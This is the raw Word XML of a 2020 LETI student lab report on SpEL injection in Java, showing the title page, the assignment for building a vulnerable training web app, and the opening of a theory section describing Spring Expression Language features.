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96064" w14:textId="77777777" w:rsidR="006037E3" w:rsidRDefault="006037E3" w:rsidP="006037E3">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:caps/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:caps/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>МИНОБРНАУКИ РОССИИ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4943DBC8" w14:textId="77777777" w:rsidR="006037E3" w:rsidRDefault="006037E3" w:rsidP="006037E3">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:caps/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:caps/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Санкт-Петербургский государственный</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B536072" w14:textId="77777777" w:rsidR="006037E3" w:rsidRDefault="006037E3" w:rsidP="006037E3">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:caps/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:caps/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>электротехнический университет</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A7D89E" w14:textId="4DBE5413" w:rsidR="006037E3" w:rsidRDefault="006037E3" w:rsidP="006037E3">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:caps/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:caps/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>«ЛЭТИ» им. В.</w:t>
      </w:r>
      <w:r w:rsidRPr="006037E3">
        <w:rPr>
          <w:b/>
          <w:caps/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:caps/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>И. Ульянова (Ленина)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2E121F" w14:textId="19AC304D" w:rsidR="006037E3" w:rsidRDefault="006037E3" w:rsidP="006037E3">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Кафедра МОЭВМ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1479F83F" w14:textId="77777777" w:rsidR="006037E3" w:rsidRDefault="006037E3" w:rsidP="006037E3">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:caps/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26353938" w14:textId="77777777" w:rsidR="006037E3" w:rsidRDefault="006037E3" w:rsidP="006037E3">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62E0D2E3" w14:textId="77777777" w:rsidR="006037E3" w:rsidRDefault="006037E3" w:rsidP="006037E3">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66073B7C" w14:textId="77777777" w:rsidR="006037E3" w:rsidRDefault="006037E3" w:rsidP="006037E3">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E81E8E7" w14:textId="77777777" w:rsidR="006037E3" w:rsidRDefault="006037E3" w:rsidP="006037E3">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18D0AC21" w14:textId="77777777" w:rsidR="006037E3" w:rsidRDefault="006037E3" w:rsidP="006037E3">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18682909" w14:textId="77777777" w:rsidR="006037E3" w:rsidRDefault="006037E3" w:rsidP="006037E3">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EFAF6D6" w14:textId="77777777" w:rsidR="006037E3" w:rsidRDefault="006037E3" w:rsidP="006037E3">
      <w:pPr>
        <w:pStyle w:val="Times1420"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="1"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:caps/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:caps/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>отчет</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43EAF5BB" w14:textId="3CD06391" w:rsidR="006037E3" w:rsidRDefault="006037E3" w:rsidP="006037E3">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">по </w:t>
      </w:r>
      <w:r w:rsidR="00DD5910">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>лабораторной</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> раб</w:t>
      </w:r>
      <w:r w:rsidR="00DD5910">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>те</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208B7F8E" w14:textId="5F659D18" w:rsidR="006037E3" w:rsidRDefault="006037E3" w:rsidP="006037E3">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>по дисциплине «</w:t>
      </w:r>
      <w:r w:rsidRPr="006037E3">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Разработка защищенных программных систем</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A939DD" w14:textId="55CA0718" w:rsidR="006037E3" w:rsidRDefault="006037E3" w:rsidP="006037E3">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Тема: «</w:t>
      </w:r>
      <w:r w:rsidRPr="006037E3">
        <w:rPr>
          <w:rStyle w:val="1"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SpEL injection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="1"/>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511D8D81" w14:textId="77777777" w:rsidR="006037E3" w:rsidRDefault="006037E3" w:rsidP="006037E3">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75CA6CDF" w14:textId="77777777" w:rsidR="006037E3" w:rsidRDefault="006037E3" w:rsidP="006037E3">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71BF8D23" w14:textId="77777777" w:rsidR="006037E3" w:rsidRDefault="006037E3" w:rsidP="006037E3">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="7830"/>
        </w:tabs>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9667BB" w14:textId="77777777" w:rsidR="006037E3" w:rsidRDefault="006037E3" w:rsidP="006037E3">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1116600E" w14:textId="77777777" w:rsidR="006037E3" w:rsidRDefault="006037E3" w:rsidP="006037E3">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="10125" w:type="dxa"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3545"/>
        <w:gridCol w:w="2977"/>
        <w:gridCol w:w="3603"/>
      </w:tblGrid>
      <w:tr w:rsidR="006037E3" w14:paraId="31CBF124" w14:textId="77777777" w:rsidTr="006037E3">
        <w:trPr>
          <w:trHeight w:val="614"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="226FBAE0" w14:textId="1EC931FE" w:rsidR="006037E3" w:rsidRDefault="006037E3" w:rsidP="006037E3">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Студентка гр. 6303</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2977" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="3360E949" w14:textId="77777777" w:rsidR="006037E3" w:rsidRDefault="006037E3" w:rsidP="006037E3">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3603" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="27E25B0E" w14:textId="77777777" w:rsidR="006037E3" w:rsidRDefault="006037E3" w:rsidP="006037E3">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Блинникова Ю.И.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006037E3" w14:paraId="7C0EA966" w14:textId="77777777" w:rsidTr="006037E3">
        <w:trPr>
          <w:trHeight w:val="614"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3544" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="77EECFBC" w14:textId="77777777" w:rsidR="006037E3" w:rsidRDefault="006037E3" w:rsidP="006037E3">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Преподаватель</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2977" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="1FA46173" w14:textId="77777777" w:rsidR="006037E3" w:rsidRDefault="006037E3" w:rsidP="006037E3">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3603" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="003B3FE3" w14:textId="2865E991" w:rsidR="006037E3" w:rsidRDefault="006037E3" w:rsidP="006037E3">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006037E3">
              <w:rPr>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>Юшкевич И.</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="006037E3">
              <w:rPr>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>А.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5985A843" w14:textId="77777777" w:rsidR="006037E3" w:rsidRDefault="006037E3" w:rsidP="006037E3">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77950474" w14:textId="77777777" w:rsidR="006037E3" w:rsidRDefault="006037E3" w:rsidP="006037E3">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AD8C87C" w14:textId="77777777" w:rsidR="006037E3" w:rsidRDefault="006037E3" w:rsidP="006037E3">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="598FF7B7" w14:textId="77777777" w:rsidR="006037E3" w:rsidRDefault="006037E3" w:rsidP="006037E3">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="031F09F1" w14:textId="77777777" w:rsidR="006037E3" w:rsidRDefault="006037E3" w:rsidP="006037E3">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Санкт-Петербург</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62304B76" w14:textId="4E7C1671" w:rsidR="006037E3" w:rsidRDefault="006037E3" w:rsidP="006037E3">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>2020</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0975CA44" w14:textId="0BD03467" w:rsidR="006037E3" w:rsidRDefault="006037E3" w:rsidP="006037E3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Задание</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4A4137" w14:textId="13B5C868" w:rsidR="00DD5910" w:rsidRPr="00337DB7" w:rsidRDefault="00DD5910" w:rsidP="00B709E6">
      <w:pPr>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Тема</w:t>
      </w:r>
      <w:r w:rsidRPr="00337DB7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: SpEL injection. </w:t>
      </w:r>
      <w:r>
        <w:t>Язык</w:t>
      </w:r>
      <w:r w:rsidRPr="00337DB7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Java</w:t>
      </w:r>
      <w:r w:rsidRPr="00337DB7">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CC5B59" w14:textId="16830B03" w:rsidR="006037E3" w:rsidRDefault="006037E3" w:rsidP="00B709E6">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>Вы должны разобраться в теме и подготовить следующие материалы:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D948B1" w14:textId="77777777" w:rsidR="006037E3" w:rsidRDefault="006037E3" w:rsidP="00B709E6">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>- Теоретический материал по выбранной теме, который состоит из следующих пунктов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC65C3A" w14:textId="77777777" w:rsidR="006037E3" w:rsidRDefault="006037E3" w:rsidP="00B709E6">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>- Описание уязвимости</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03CD2A8A" w14:textId="77777777" w:rsidR="006037E3" w:rsidRDefault="006037E3" w:rsidP="00B709E6">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>- Типичные примеры реализации уязвимости</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70E5A135" w14:textId="77777777" w:rsidR="006037E3" w:rsidRDefault="006037E3" w:rsidP="00B709E6">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>- Как ее можно обнаружить в коде и во время тестирования.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34666D7C" w14:textId="77777777" w:rsidR="006037E3" w:rsidRDefault="006037E3" w:rsidP="00B709E6">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>- Как ее эксплуатировать.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5882F201" w14:textId="77777777" w:rsidR="006037E3" w:rsidRDefault="006037E3" w:rsidP="00B709E6">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>- Как ее необходимо устранить.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328B06E7" w14:textId="77777777" w:rsidR="006037E3" w:rsidRDefault="006037E3" w:rsidP="00B709E6">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>- Примеры из открытых источников, где она была обнаружена.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A948D09" w14:textId="77777777" w:rsidR="006037E3" w:rsidRDefault="006037E3" w:rsidP="00B709E6">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>- Реализация лабораторной работы, которая показывает, как та или иная уязвимость выглядит на практике.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604B104F" w14:textId="51D99B16" w:rsidR="006037E3" w:rsidRDefault="006037E3" w:rsidP="00B709E6">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Лабораторная работа должна представлять собой исходный код </w:t>
      </w:r>
      <w:r w:rsidR="00DD5910">
        <w:t>п</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">риложения и пошаговый мануал, как она может быть развернута из исходного кода приложения. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABDA28E" w14:textId="77777777" w:rsidR="006037E3" w:rsidRDefault="006037E3" w:rsidP="00B709E6">
      <w:pPr>
        <w:ind w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>Лабораторная работа - приближенное к реальному веб-приложение. Под этим подразумевается наличие трех составляющих:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18120518" w14:textId="77777777" w:rsidR="006037E3" w:rsidRDefault="006037E3" w:rsidP="00B709E6">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">- Дизайна; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="065A2597" w14:textId="77777777" w:rsidR="006037E3" w:rsidRDefault="006037E3" w:rsidP="00B709E6">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>- Разнообразной функциональности;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3FB6E2" w14:textId="241F87CA" w:rsidR="006037E3" w:rsidRDefault="006037E3" w:rsidP="00B709E6">
      <w:pPr>
        <w:ind w:left="708" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>- “Легенда” - описание веб приложения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D771727" w14:textId="7B0CE7C2" w:rsidR="00DD5910" w:rsidRDefault="006037E3" w:rsidP="00B709E6">
      <w:pPr>
        <w:ind w:firstLine="708"/>
      </w:pPr>
      <w:r>
        <w:t>Для каждого веб-приложения должен быть реализован скрипт проверки наличия уязвимости либо ее устранения. При эксплуатации уязвимости пользователем, приложение должно предоставлять “флаг”, который подтверждал бы факт эксплуатации. Все приложения должны использоваться на ОС Linux, без использования Docker. Приложение не должно использовать коммерческие продукты в своей функциональности.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53FD6820" w14:textId="77777777" w:rsidR="00DD5910" w:rsidRDefault="00DD5910">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:contextualSpacing w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="55222B07" w14:textId="74E29CDD" w:rsidR="00DD5910" w:rsidRPr="00AE10F2" w:rsidRDefault="00DD5910" w:rsidP="00AE10F2">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Теоретический материал</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045C83BF" w14:textId="2192CB21" w:rsidR="00DD5910" w:rsidRDefault="00DD5910" w:rsidP="00AE10F2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Описание уязвимости</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8CA332" w14:textId="77777777" w:rsidR="00E04BEE" w:rsidRDefault="00B709E6" w:rsidP="00B709E6">
      <w:r>
        <w:t>SpEL — это язык выражений, созданный для Spring Framework, который поддерживает запросы и управление графом объектов во время выполнения.</w:t>
      </w:r>
      <w:r w:rsidRPr="00B709E6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>SpEL создан в виде API-интерфейса, позволяющего интегрировать его в другие приложения и фрэймворки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A85A43B" w14:textId="035B752E" w:rsidR="00E04BEE" w:rsidRDefault="00E04BEE" w:rsidP="00E04BEE">
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>SpEL</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> используется в </w:t>
      </w:r>
      <w:r w:rsidRPr="00E04BEE">
        <w:t>Spring Framework</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, например, в </w:t>
      </w:r>
      <w:r w:rsidRPr="00E04BEE">
        <w:t>Security</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00E04BEE">
        <w:t xml:space="preserve"> Data</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidRPr="00E04BEE">
        <w:t>Для языков он может использоваться в Java, Kotlin, Scala и других технологиях</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, основанных на </w:t>
      </w:r>
      <w:r w:rsidRPr="00E04BEE">
        <w:t>JVM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C173CE0" w14:textId="267751B0" w:rsidR="0013017F" w:rsidRPr="00DF7AF1" w:rsidRDefault="0013017F" w:rsidP="00E04BEE">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r w:rsidRPr="0013017F">
        <w:t>SpEL поддерживает широкий спектр функций, таких как:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19AA104F" w14:textId="77777777" w:rsidR="0013017F" w:rsidRDefault="00F55ECD" w:rsidP="0013017F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>логические и реляционные операторы</w:t>
      </w:r>
      <w:r w:rsidRPr="00F55ECD">
        <w:t>;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5F7906" w14:textId="1C799E46" w:rsidR="0013017F" w:rsidRDefault="0013017F" w:rsidP="0013017F">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>литеральные</w:t>
      </w:r>
      <w:r w:rsidR="00F55ECD">
        <w:t xml:space="preserve"> выражения</w:t>
      </w:r>
      <w:r w:rsidR="00F55ECD" w:rsidRPr="00F55ECD">
        <w:t xml:space="preserve">; </w:t>
      </w:r>
    </w:p>
